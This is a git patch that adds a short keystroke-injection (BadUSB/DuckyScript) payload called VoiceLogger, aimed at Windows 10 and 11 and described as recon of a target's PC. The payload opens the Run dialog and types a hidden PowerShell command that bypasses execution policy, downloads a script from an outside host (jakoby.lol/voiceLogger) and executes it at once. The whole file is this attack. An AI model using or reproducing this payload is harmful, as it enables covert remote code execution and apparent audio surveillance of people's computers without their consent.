From 85035bb3bbf0b2bee7f997cbb0b6f914781f2fb8 Mon Sep 17 00:00:00 2001 From: I-Am-Jakoby Date: Wed, 3 May 2023 12:59:32 -0500 Subject: [PATCH] Create VoiceLogger.txt --- Payloads/VoiceLogger/VoiceLogger.txt | 12 ++++++++++++ 1 file changed, 12 insertions(+) create mode 100644 Payloads/VoiceLogger/VoiceLogger.txt diff --git a/Payloads/VoiceLogger/VoiceLogger.txt b/Payloads/VoiceLogger/VoiceLogger.txt new file mode 100644 index 0000000..2034cc9 --- /dev/null +++ b/Payloads/VoiceLogger/VoiceLogger.txt @@ -0,0 +1,12 @@ +REM Title: VoiceLogger + +REM Author: I am Jakoby + +REM Description: This payload is meant to do an advanced recon of the target's PC. See README.md file for more details. + +REM Target: Windows 10, 11 + +GUI r +DELAY 500 +STRING powershell -w h -NoP -Ep Bypass $dc='';$db='';irm jakoby.lol/voiceLogger | iex +ENTER